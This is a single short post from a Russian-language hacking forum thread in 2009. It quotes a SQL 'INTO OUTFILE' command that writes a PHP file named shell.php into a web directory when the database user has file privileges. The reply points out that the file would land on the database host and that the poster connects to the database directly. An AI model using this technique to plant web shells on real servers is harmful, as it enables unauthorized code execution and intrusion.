Показать сообщение отдельно

  #6  
Старый 17.10.2009, 19:56
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Цитата:
Сообщение от mailbrush  
Если file_priv = Y и есть путь к корню, то
Код:
SELECT '<?php echo "shellcode"; ?>' FROM table_name INTO OUTFILE '/full/path/to/dir/shell.php'
Если даже и так то он зальёт на сервер с БД
Я обращаюсь к БД напрямую а не через инъекцию
 
Ответить с цитированием